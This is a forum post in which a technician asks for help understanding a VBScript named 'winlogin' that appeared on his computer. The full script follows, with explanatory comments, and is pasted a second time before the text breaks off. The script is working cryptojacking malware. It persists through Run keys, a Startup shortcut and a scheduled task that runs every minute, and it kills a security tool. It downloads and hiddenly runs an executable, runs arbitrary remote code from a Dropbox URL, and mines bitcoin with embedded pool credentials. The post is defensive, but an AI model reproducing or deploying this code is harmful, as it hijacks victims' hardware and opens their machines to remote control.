As of this morning, each time I start my computer I am prompted to run a vbs called "winlogin" . . . it seems to be an attempt on someone's behalf to use my computer's processing power to make money through something called "bitcoin". I'm a technician (have been for 17 years) and I will eventually remove the script, but while it's still on the computer (though inactive) I am wondering if anyone could tell me what exactly it is trying to achieve and how - I'm very curious about what exactly the script means - I am not a programmer :confused: - I have been able to get the gist of it by looking at the code, but am unsure about the finer details. If you're so inclined, could you have a look and tell me what this vbs is hoping to do and how it hopes to do it. Thanks!
Here's the code:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
'0.5.2
' dl: downloads strFileURL with a synchronous HTTP GET and writes the raw response
' body to strHDLocation. Only acts on HTTP 200; any other status (or a network
' error, swallowed by the script-level On Error Resume Next) leaves the target
' untouched and is never reported. There is no signature or hash check: whatever
' the URL serves is written to disk as-is.
sub dl(strFileURL, strHDLocation)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
' Type 1 = binary stream, so ResponseBody (a byte array) is stored verbatim.
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
' An existing file at the destination is deleted first (no backup, no prompt).
If objFSO.Fileexists(strHDLocation) Then
objFSO.DeleteFile strHDLocation
end if
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
' dlEval: the remote-control hook. Fetches strFileURL and hands the whole response
' text to Execute(), i.e. runs arbitrary VBScript chosen by whoever controls that URL.
' For an analyst this is the most important routine in the file: anything could have
' been run through it, so the visible script is NOT a complete record of what happened
' on the host.
' The "call Uninstall()" comparison only matches when the response is exactly that
' text, and it is evaluated *after* Execute has already run; Uninstall() itself is an
' empty stub, so that command merely ends this process.
' objXMLHTTP is only released on the 200 path.
sub dlEval(strFileURL)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Execute(objXMLHTTP.ResponseText)
if (objXMLHTTP.ResponseText = "call Uninstall()") then
wscript.quit
end if
Set objXMLHTTP = Nothing
End if
end sub
' ex: starts the command line in path via WMI Win32_Process.Create with
' ShowWindow = 0 (HIDDEN_WINDOW), so the user never sees a console or window.
' Create does not wait for the child to exit; its return code and the PID
' (intProcessID) are discarded, so a failed launch is silent.
sub ex(path)
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create path, null, objConfig, intProcessID
end sub
' countProcess: number of running processes whose image name equals name
' (exact, case-sensitive string comparison against Win32_Process.Name).
function countProcess(name)
set service = GetObject ("winmgmts:")
counter = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = name then
counter = counter+1
End If
next
countProcess = counter
end Function
' checkIfRunning: crude single-instance check. Counts every wscript.exe on the box;
' if more than one exists it assumes another copy of this script is running, returns
' True and, when quit = True, terminates this instance.
' Analyst notes: any unrelated wscript.exe-hosted script also trips this check, and a
' copy hosted by cscript.exe is never counted. It is called from the top level *after*
' infect(), so persistence is re-applied on every start even when the script then quits.
Function checkIfRunning(quit)
counter = countProcess("wscript.exe")
if counter > 1 then
checkIfRunning = true
if (quit = true) then
wscript.quit
end if
exit function
end if
checkIfRunning = false
end function
' getEnv: expands %variableName% and returns the expanded string, or False when the
' variable is unset (ExpandEnvironmentStrings leaves the "%name%" text unchanged in
' that case). Callers test the result with "<> false".
Function getEnv(variableName)
Set wshShell = CreateObject( "WScript.Shell" )
result = wshShell.ExpandEnvironmentStrings( "%" & variableName & "%" )
if (result <> "%" & variableName & "%") then
getEnv = result
exit Function
end if
getEnv = false
end Function
' findTmpDir: the first of %TEMP%, %TMP% that is set; False if neither is.
' Every drop location (script copy, arc.exe, miner folders) is derived from this.
function findTmpDir()
tmp = getEnv("TEMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
tmp = getEnv("TMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
findTmpDir = false
end Function
' verifyRegistryKey: despite the name this verifies nothing; it unconditionally
' writes val into key as a REG_SZ value, creating or overwriting it.
sub verifyRegistryKey(key, val)
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.RegWrite key, val, "REG_SZ"
Set oShell = Nothing
end sub
' getAutostartPath: full path of the persistence shortcut,
' "<current user's Startup folder>\Windows Login Script.lnk".
' Never returns False, so verifyAutostart's "<> false" guard is always satisfied.
function getAutostartPath()
Set oShell = WScript.CreateObject("WScript.Shell")
path = oShell.SpecialFolders("Startup")
Set oShell = Nothing
path=path & "\Windows Login Script.lnk"
getAutostartPath = path
end function
' verifyAutostart: creates (or overwrites) the Startup-folder shortcut so that path
' is launched at each interactive logon of this user. infect() passes the
' %USERPROFILE%\winlogin.vbs copy.
sub verifyAutostart(path)
aPath = getAutostartPath()
if (aPath <> false) then
Set oShell = WScript.CreateObject("WScript.Shell")
set lnk = oShell.CreateShortcut(aPath)
lnk.TargetPath = path
lnk.save
set oShell = Nothing
end if
end sub
' getTmpPath: first drop location, %TEMP%\winlogin.vbs (False if no temp dir).
' This copy is what the Run registry values point at.
function getTmpPath()
tmp = findTmpDir()
if (tmp <> false) then
tmp = tmp & "\winlogin.vbs"
end if
getTmpPath = tmp
end function
' getUserProfilePath: second drop location, %USERPROFILE%\winlogin.vbs (False if
' unset). This copy is what the Startup shortcut and the scheduled task point at.
function getUserProfilePath()
up = getEnv("USERPROFILE")
if (up <> false) then
up = up & "\winlogin.vbs"
end if
getUserProfilePath = up
end function
' copySelf: copies the running script (Wscript.ScriptFullName) to both drop
' locations, %TEMP%\winlogin.vbs and %USERPROFILE%\winlogin.vbs, overwriting
' existing files (third argument True). Runs on every start, so deleting one copy
' while the other still executes does not remove the infection.
sub copySelf
Set oFSO = CreateObject("Scripting.FileSystemObject")
tmp = getTmpPath
if (tmp <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, tmp, true)
end if
up = getUserProfilePath()
if (up <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, up, true)
end if
set oFSO = Nothing
end sub
' Uninstall: empty stub. There is no removal routine in this version; the
' "call Uninstall()" server command only makes dlEval end the current process.
sub Uninstall()
'FIXME: [Future] Uninstall procedure
end sub
' Update: empty stub, never called. Self-update is effectively provided by dlEval,
' which can Execute() any replacement code the server sends.
sub Update()
'FIXME: [Future] Update procedure
end sub
' tryToKillProcess: terminates every process named name via WMI and returns how many
' Terminate() calls were made (not how many succeeded; the caller ignores the value).
' Used by infect() only against TeaTimer.exe.
Function tryToKillProcess(name)
set objWMIService = GETOBJECT("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set colProcess = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & name & "'")
count = 0
for each objProcess in colProcess
objProcess.Terminate()
count = count + 1
next
tryToKillProcess = count
end Function
' addScheduledTask: the persistence mechanism that keeps the miner alive even after
' the Run values and shortcut are removed. Re-runs %USERPROFILE%\winlogin.vbs:
'   - Vista and later (schtasks.exe on PATH, OS version not "5.1"): task named
'     "Windows Login Script", every 1 minute (/SC MINUTE /MO 1), /F overwrites any
'     existing task on every start. The script is launched through the .vbs file
'     association.
'   - XP (version "5.1") or no schtasks.exe: legacy AT jobs via Win32_ScheduledJob.
'     Unless a job already mentions winlogin.vbs, 24 jobs are created, one per hour
'     at HH:10 (DMTF time string "********HH1000.000000-000"), all days (127 bitmask),
'     repeating (True).
' ServicePack is read but never used. Errors from the WMI Create are stored in
' errJobCreated and ignored.
sub addScheduledTask()
cmd = getUserProfilePath()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colOperatingSystem = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystem
ServicePack = objOperatingSystem.ServicePackMajorVersion
Version = objOperatingSystem.Version
Next
IF Mid(Version,1,3) = "5.1" Then
xp = true
else
xp = false
end if
if (fileExists("schtasks.exe") = true and xp = false) then
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
else
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colScheduledJobs = objWMIService.ExecQuery("Select * from Win32_ScheduledJob")
Needed = true
For Each objJob in colScheduledJobs
if InStr(LCase(objJob.Command), "winlogin.vbs") then
Needed = false
end if
next
if Needed = true then
Set objNewJob = objWMIService.Get("Win32_ScheduledJob")
for i=0 to 23
' Zero-pad the hour so the time string keeps its fixed-width layout.
if (len(i) < 2) then
strTime = "********0" & i & "1000.000000-000"
else
strTime = "********" & i & "1000.000000-000"
end if
errJobCreated = objNewJob.Create ("wscript.exe """ & cmd & """", strTime, True , 127, , , JobID)
next
end if
end if
end sub
' infect: installs persistence. Steps:
'   1. copySelf        -> %TEMP%\winlogin.vbs and %USERPROFILE%\winlogin.vbs
'   2. If TeaTimer.exe is running (presumably Spybot's registry-change guard —
'      inferred from the name), try to kill it; if it survives, skip the registry
'      writes so the guard does not alert the user.
'   3. HKCU\...\Run\"Microsoft Login Script" = %TEMP%\winlogin.vbs (always tried);
'      the same value under HKLM is attempted and the error used as an admin
'      test — the resulting "admin" flag is never read afterwards.
'   4. Startup-folder shortcut "Windows Login Script.lnk" -> %USERPROFILE% copy
'   5. Scheduled task / AT jobs (see addScheduledTask)
' The On Error Resume Next here is redundant with the one at script level.
sub infect()
call copySelf
skipRegistryInfection = false
if (countProcess("TeaTimer.exe") > 0) then
tryToKillProcess("TeaTimer.exe")
if (countProcess("TeaTimer.exe") > 0) then
skipRegistryInfection = true
end if
end if
if (skipRegistryInfection = false) then
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
Err.Clear()
On Error Resume Next
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
if (Err.Number <> 0) then
admin = false
else
admin = true
end if
'FIXME: [Future] for USB spreading (disabled in this version: the author planned to
'clear NoDriveTypeAutoRun so removable media would autorun)
'call verifyRegistryKey("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutorun", 0)
end if
call verifyAutoStart(getUserProfilePath())
call addScheduledTask()
end sub
' getMinerPath: where the miner binaries live once arc.exe has been unpacked into
' the temp directory:
'   "gpu" -> %TEMP%\cgm\msdc.exe      "cpu" -> %TEMP%\rpcm\svehost.exe
' The names are chosen to resemble Windows components (e.g. svchost.exe) — an
' inference from the spelling. Any other miner value leaves minerName empty, so the
' bare temp directory is returned instead of False.
Function getMinerPath(miner)
tmp = findTmpDir()
getMinerPath = false
if (tmp <> false) then
Select case miner
Case "gpu"
minerName = "\cgm\msdc.exe"
Case "cpu"
minerName = "\rpcm\svehost.exe"
end select
getMinerPath = tmp & minerName
end if
end Function
' fileExists: True if a file named theDLL exists in any directory listed in %PATH%.
' Used to detect schtasks.exe (task scheduler available) and openCL.dll (GPU
' mining possible). A file outside PATH is not found.
function fileExists(theDLL)
sysPath = getEnv("PATH")
arSysPath = Split(sysPath, ";")
Set objFSO = Createobject("Scripting.FileSystemObject")
fileExists = false
for each path in arSysPath
If objFSO.Fileexists(path & "\" & theDLL) Then
fileExists = true
exit for
end if
next
Set objFSO = Nothing
End Function
' getRequiredPackages: when either miner binary is missing, downloads "arc.exe" from
' a Dropbox share to %TEMP%\arc.exe and runs "arc.exe x -o<TEMP> -y" hidden. The
' switches look like a 7-Zip-style "extract to directory, assume yes" command, so
' arc.exe is presumably a self-extracting archive holding the cgm\ and rpcm\ folders
' (inference; the archive is not part of this listing).
' Nothing validates what was downloaded. Because ex() does not wait for the
' extractor, the miners may not exist yet when payload() tries to start them on the
' first pass; the per-minute task simply retries later.
sub getRequiredPackages()
cgm = getMinerPath("gpu")
rpcm = getMinerPath("cpu")
if (cgm <> false and rpcm <> false) then
Set objFSO = Createobject("Scripting.FileSystemObject")
needed = false
If not objFSO.Fileexists(cgm) or not objFSO.Fileexists(rpcm) Then
needed = true
end if
if (needed = true) then
tmp = findTmpDir()
tmpPath = tmp & "\arc.exe"
'FIXME: CHANGE ADDRESS!
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call ex(tmpPath & " x -o" & tmp & " -y")
end if
end if
end sub
' verifyPayloadRunning: True if any miner process is alive: msdc.exe (GPU),
' svehost.exe (CPU) or wmisrv.exe. wmisrv.exe is not a name this version launches —
' presumably a leftover from an earlier build, but also a process name worth checking
' for during cleanup.
Function verifyPayloadRunning()
verifyPayloadRunning = false
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
if (cgCount + rpcCount > 0) then
verifyPayloadRunning = true
end if
end Function
' startGPUMining: launches the GPU miner (hidden, via cmd.exe /c) against the pool
' api.bitcoin.cz:8332 with the worker credentials hallmining.worker1 / 7d9LwsMG
' embedded in clear text. The -o/-O/-I switches are cgminer-style (inference).
' The pool host and worker name are the best indicators for tying this sample to
' its operator; they are also a network IOC (outbound TCP 8332).
sub startGPUMining()
cgm = getMinerPath("gpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & cgm & " -o api.bitcoin.cz:8332 -O hallmining.worker1:7d9LwsMG --no-pool-disable -I -2")
end sub
' startCPUMining: launches the CPU miner (hidden, via cmd.exe /c) against the same
' pool and worker account as the GPU miner. Thread count is half of
' %NUMBER_OF_PROCESSORS% (integer division), at least 1 — presumably to keep CPU
' usage below what a user would notice (inference).
sub startCPUMining()
threads = getEnv("NUMBER_OF_PROCESSORS")
if threads = false then
threads = 1
else
if (threads > 1) then
threads = int(threads/2)
end if
end if
rpcm = getMinerPath("cpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & rpcm & " -url=http://api.bitcoin.cz:8332 -threads=" & threads & " -user=hallmining.worker1 -password=7d9LwsMG")
end sub
' payload: if no miner is already running, make sure the binaries are present, then
' prefer GPU mining when openCL.dll is found on PATH; wait 10 s and fall back to
' CPU mining if no miner process appeared. Without OpenCL, go straight to CPU mining.
' Called on every start (i.e. every minute via the task), so killing the miner
' process alone only buys a minute.
sub payload()
running = verifyPayloadRunning()
if (running = false) then
call getRequiredPackages()
tmp = findTmpDir()
if (tmp <> false) then
if (fileExists("openCL.dll") = true) then
call startGPUMining()
wscript.sleep(10000)
if (verifyPayloadRunning() = false) then
call startCPUMining()
end if
else
call startCPUMining()
end if
end if
end if
end sub
' ---- Entry point / analyst summary --------------------------------------------
' What this script does, in order:
'   1. infect()        copies itself to %TEMP%\winlogin.vbs and %USERPROFILE%\winlogin.vbs
'                      and installs Run value(s) "Microsoft Login Script", the Startup
'                      shortcut "Windows Login Script.lnk" and a scheduled task
'                      "Windows Login Script" that re-runs it every minute (hourly AT
'                      jobs on XP).
'   2. checkIfRunning  exits if another wscript.exe is already running.
'   3. dlEval(...)     downloads and Execute()s whatever text the Dropbox URL returns
'                      ("?" & Timer is only a cache-buster). This is remote code
'                      execution: the operator could have run anything, so removing
'                      the miner alone is not proof the host is clean.
'   4. payload()       fetches/unpacks the miner package if needed and starts GPU
'                      mining (openCL.dll on PATH) or CPU mining on half the cores,
'                      paying out to pool api.bitcoin.cz, worker hallmining.worker1.
' A script with a per-minute task and autorun entries is not "inactive" while it
' stays on disk. Cleanup implied by the code: the task / AT jobs, the HKCU and HKLM
' Run values, the .lnk, both winlogin.vbs copies, %TEMP%\arc.exe, %TEMP%\cgm,
' %TEMP%\rpcm, and the msdc.exe / svehost.exe (and wmisrv.exe) processes.
' On Error Resume Next hides every failure, so partial installs are likely.
'TODO: scramble code
On Error Resume Next
call infect()
call checkIfRunning(true)
'FIXME: CHANGE ADDRESS!
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
call payload()
Here's the code (the listing below is a verbatim repeat of the one above):
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
'0.5.2
' dl: downloads strFileURL with a synchronous HTTP GET and writes the raw response
' body to strHDLocation. Only acts on HTTP 200; any other status (or a network
' error, swallowed by the script-level On Error Resume Next) leaves the target
' untouched and is never reported. There is no signature or hash check: whatever
' the URL serves is written to disk as-is.
sub dl(strFileURL, strHDLocation)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
' Type 1 = binary stream, so ResponseBody (a byte array) is stored verbatim.
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
' An existing file at the destination is deleted first (no backup, no prompt).
If objFSO.Fileexists(strHDLocation) Then
objFSO.DeleteFile strHDLocation
end if
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
' dlEval: the remote-control hook. Fetches strFileURL and hands the whole response
' text to Execute(), i.e. runs arbitrary VBScript chosen by whoever controls that URL.
' For an analyst this is the most important routine in the file: anything could have
' been run through it, so the visible script is NOT a complete record of what happened
' on the host.
' The "call Uninstall()" comparison only matches when the response is exactly that
' text, and it is evaluated *after* Execute has already run; Uninstall() itself is an
' empty stub, so that command merely ends this process.
' objXMLHTTP is only released on the 200 path.
sub dlEval(strFileURL)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Execute(objXMLHTTP.ResponseText)
if (objXMLHTTP.ResponseText = "call Uninstall()") then
wscript.quit
end if
Set objXMLHTTP = Nothing
End if
end sub
' ex: starts the command line in path via WMI Win32_Process.Create with
' ShowWindow = 0 (HIDDEN_WINDOW), so the user never sees a console or window.
' Create does not wait for the child to exit; its return code and the PID
' (intProcessID) are discarded, so a failed launch is silent.
sub ex(path)
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create path, null, objConfig, intProcessID
end sub
' countProcess: number of running processes whose image name equals name
' (exact, case-sensitive string comparison against Win32_Process.Name).
function countProcess(name)
set service = GetObject ("winmgmts:")
counter = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = name then
counter = counter+1
End If
next
countProcess = counter
end Function
' checkIfRunning: crude single-instance check. Counts every wscript.exe on the box;
' if more than one exists it assumes another copy of this script is running, returns
' True and, when quit = True, terminates this instance.
' Analyst notes: any unrelated wscript.exe-hosted script also trips this check, and a
' copy hosted by cscript.exe is never counted. It is called from the top level *after*
' infect(), so persistence is re-applied on every start even when the script then quits.
Function checkIfRunning(quit)
counter = countProcess("wscript.exe")
if counter > 1 then
checkIfRunning = true
if (quit = true) then
wscript.quit
end if
exit function
end if
checkIfRunning = false
end function
' getEnv: expands %variableName% and returns the expanded string, or False when the
' variable is unset (ExpandEnvironmentStrings leaves the "%name%" text unchanged in
' that case). Callers test the result with "<> false".
Function getEnv(variableName)
Set wshShell = CreateObject( "WScript.Shell" )
result = wshShell.ExpandEnvironmentStrings( "%" & variableName & "%" )
if (result <> "%" & variableName & "%") then
getEnv = result
exit Function
end if
getEnv = false
end Function
' findTmpDir: the first of %TEMP%, %TMP% that is set; False if neither is.
' Every drop location (script copy, arc.exe, miner folders) is derived from this.
function findTmpDir()
tmp = getEnv("TEMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
tmp = getEnv("TMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
findTmpDir = false
end Function
' verifyRegistryKey: despite the name this verifies nothing; it unconditionally
' writes val into key as a REG_SZ value, creating or overwriting it.
sub verifyRegistryKey(key, val)
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.RegWrite key, val, "REG_SZ"
Set oShell = Nothing
end sub
' getAutostartPath: full path of the persistence shortcut,
' "<current user's Startup folder>\Windows Login Script.lnk".
' Never returns False, so verifyAutostart's "<> false" guard is always satisfied.
function getAutostartPath()
Set oShell = WScript.CreateObject("WScript.Shell")
path = oShell.SpecialFolders("Startup")
Set oShell = Nothing
path=path & "\Windows Login Script.lnk"
getAutostartPath = path
end function
' verifyAutostart: creates (or overwrites) the Startup-folder shortcut so that path
' is launched at each interactive logon of this user. infect() passes the
' %USERPROFILE%\winlogin.vbs copy.
sub verifyAutostart(path)
aPath = getAutostartPath()
if (aPath <> false) then
Set oShell = WScript.CreateObject("WScript.Shell")
set lnk = oShell.CreateShortcut(aPath)
lnk.TargetPath = path
lnk.save
set oShell = Nothing
end if
end sub
' getTmpPath: first drop location, %TEMP%\winlogin.vbs (False if no temp dir).
' This copy is what the Run registry values point at.
function getTmpPath()
tmp = findTmpDir()
if (tmp <> false) then
tmp = tmp & "\winlogin.vbs"
end if
getTmpPath = tmp
end function
' getUserProfilePath: second drop location, %USERPROFILE%\winlogin.vbs (False if
' unset). This copy is what the Startup shortcut and the scheduled task point at.
function getUserProfilePath()
up = getEnv("USERPROFILE")
if (up <> false) then
up = up & "\winlogin.vbs"
end if
getUserProfilePath = up
end function
' copySelf: copies the running script (Wscript.ScriptFullName) to both drop
' locations, %TEMP%\winlogin.vbs and %USERPROFILE%\winlogin.vbs, overwriting
' existing files (third argument True). Runs on every start, so deleting one copy
' while the other still executes does not remove the infection.
sub copySelf
Set oFSO = CreateObject("Scripting.FileSystemObject")
tmp = getTmpPath
if (tmp <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, tmp, true)
end if
up = getUserProfilePath()
if (up <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, up, true)
end if
set oFSO = Nothing
end sub
' Uninstall: empty stub. There is no removal routine in this version; the
' "call Uninstall()" server command only makes dlEval end the current process.
sub Uninstall()
'FIXME: [Future] Uninstall procedure
end sub
' Update: empty stub, never called. Self-update is effectively provided by dlEval,
' which can Execute() any replacement code the server sends.
sub Update()
'FIXME: [Future] Update procedure
end sub
' tryToKillProcess: terminates every process named name via WMI and returns how many
' Terminate() calls were made (not how many succeeded; the caller ignores the value).
' Used by infect() only against TeaTimer.exe.
Function tryToKillProcess(name)
set objWMIService = GETOBJECT("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set colProcess = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & name & "'")
count = 0
for each objProcess in colProcess
objProcess.Terminate()
count = count + 1
next
tryToKillProcess = count
end Function
' addScheduledTask: the persistence mechanism that keeps the miner alive even after
' the Run values and shortcut are removed. Re-runs %USERPROFILE%\winlogin.vbs:
'   - Vista and later (schtasks.exe on PATH, OS version not "5.1"): task named
'     "Windows Login Script", every 1 minute (/SC MINUTE /MO 1), /F overwrites any
'     existing task on every start. The script is launched through the .vbs file
'     association.
'   - XP (version "5.1") or no schtasks.exe: legacy AT jobs via Win32_ScheduledJob.
'     Unless a job already mentions winlogin.vbs, 24 jobs are created, one per hour
'     at HH:10 (DMTF time string "********HH1000.000000-000"), all days (127 bitmask),
'     repeating (True).
' ServicePack is read but never used. Errors from the WMI Create are stored in
' errJobCreated and ignored.
sub addScheduledTask()
cmd = getUserProfilePath()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colOperatingSystem = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystem
ServicePack = objOperatingSystem.ServicePackMajorVersion
Version = objOperatingSystem.Version
Next
IF Mid(Version,1,3) = "5.1" Then
xp = true
else
xp = false
end if
if (fileExists("schtasks.exe") = true and xp = false) then
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
else
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colScheduledJobs = objWMIService.ExecQuery("Select * from Win32_ScheduledJob")
Needed = true
For Each objJob in colScheduledJobs
if InStr(LCase(objJob.Command), "winlogin.vbs") then
Needed = false
end if
next
if Needed = true then
Set objNewJob = objWMIService.Get("Win32_ScheduledJob")
for i=0 to 23
' Zero-pad the hour so the time string keeps its fixed-width layout.
if (len(i) < 2) then
strTime = "********0" & i & "1000.000000-000"
else
strTime = "********" & i & "1000.000000-000"
end if
errJobCreated = objNewJob.Create ("wscript.exe """ & cmd & """", strTime, True , 127, , , JobID)
next
end if
end if
end sub
' infect: installs persistence. Steps:
'   1. copySelf        -> %TEMP%\winlogin.vbs and %USERPROFILE%\winlogin.vbs
'   2. If TeaTimer.exe is running (presumably Spybot's registry-change guard —
'      inferred from the name), try to kill it; if it survives, skip the registry
'      writes so the guard does not alert the user.
'   3. HKCU\...\Run\"Microsoft Login Script" = %TEMP%\winlogin.vbs (always tried);
'      the same value under HKLM is attempted and the error used as an admin
'      test — the resulting "admin" flag is never read afterwards.
'   4. Startup-folder shortcut "Windows Login Script.lnk" -> %USERPROFILE% copy
'   5. Scheduled task / AT jobs (see addScheduledTask)
' The On Error Resume Next here is redundant with the one at script level.
sub infect()
call copySelf
skipRegistryInfection = false
if (countProcess("TeaTimer.exe") > 0) then
tryToKillProcess("TeaTimer.exe")
if (countProcess("TeaTimer.exe") > 0) then
skipRegistryInfection = true
end if
end if
if (skipRegistryInfection = false) then
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
Err.Clear()
On Error Resume Next
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
if (Err.Number <> 0) then
admin = false
else
admin = true
end if
'FIXME: [Future] for USB spreading (disabled in this version: the author planned to
'clear NoDriveTypeAutoRun so removable media would autorun)
'call verifyRegistryKey("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutorun", 0)
end if
call verifyAutoStart(getUserProfilePath())
call addScheduledTask()
end sub
' getMinerPath: where the miner binaries live once arc.exe has been unpacked into
' the temp directory:
'   "gpu" -> %TEMP%\cgm\msdc.exe      "cpu" -> %TEMP%\rpcm\svehost.exe
' The names are chosen to resemble Windows components (e.g. svchost.exe) — an
' inference from the spelling. Any other miner value leaves minerName empty, so the
' bare temp directory is returned instead of False.
Function getMinerPath(miner)
tmp = findTmpDir()
getMinerPath = false
if (tmp <> false) then
Select case miner
Case "gpu"
minerName = "\cgm\msdc.exe"
Case "cpu"
minerName = "\rpcm\svehost.exe"
end select
getMinerPath = tmp & minerName
end if
end Function
' fileExists: True if a file named theDLL exists in any directory listed in %PATH%.
' Used to detect schtasks.exe (task scheduler available) and openCL.dll (GPU
' mining possible). A file outside PATH is not found.
function fileExists(theDLL)
sysPath = getEnv("PATH")
arSysPath = Split(sysPath, ";")
Set objFSO = Createobject("Scripting.FileSystemObject")
fileExists = false
for each path in arSysPath
If objFSO.Fileexists(path & "\" & theDLL) Then
fileExists = true
exit for
end if
next
Set objFSO = Nothing
End Function
' getRequiredPackages: when either miner binary is missing, downloads "arc.exe" from
' a Dropbox share to %TEMP%\arc.exe and runs "arc.exe x -o<TEMP> -y" hidden. The
' switches look like a 7-Zip-style "extract to directory, assume yes" command, so
' arc.exe is presumably a self-extracting archive holding the cgm\ and rpcm\ folders
' (inference; the archive is not part of this listing).
' Nothing validates what was downloaded. Because ex() does not wait for the
' extractor, the miners may not exist yet when payload() tries to start them on the
' first pass; the per-minute task simply retries later.
sub getRequiredPackages()
cgm = getMinerPath("gpu")
rpcm = getMinerPath("cpu")
if (cgm <> false and rpcm <> false) then
Set objFSO = Createobject("Scripting.FileSystemObject")
needed = false
If not objFSO.Fileexists(cgm) or not objFSO.Fileexists(rpcm) Then
needed = true
end if
if (needed = true) then
tmp = findTmpDir()
tmpPath = tmp & "\arc.exe"
'FIXME: CHANGE ADDRESS!
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call ex(tmpPath & " x -o" & tmp & " -y")
end if
end if
end sub
' verifyPayloadRunning: True if any miner process is alive: msdc.exe (GPU),
' svehost.exe (CPU) or wmisrv.exe. wmisrv.exe is not a name this version launches —
' presumably a leftover from an earlier build, but also a process name worth checking
' for during cleanup.
Function verifyPayloadRunning()
verifyPayloadRunning = false
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
if (cgCount + rpcCount > 0) then
verifyPayloadRunning = true
end if
end Function
' startGPUMining: launches the GPU miner (hidden, via cmd.exe /c) against the pool
' api.bitcoin.cz:8332 with the worker credentials hallmining.worker1 / 7d9LwsMG
' embedded in clear text. The -o/-O/-I switches are cgminer-style (inference).
' The pool host and worker name are the best indicators for tying this sample to
' its operator; they are also a network IOC (outbound TCP 8332).
sub startGPUMining()
cgm = getMinerPath("gpu")
'FIXME: Change minnig account!!!!!
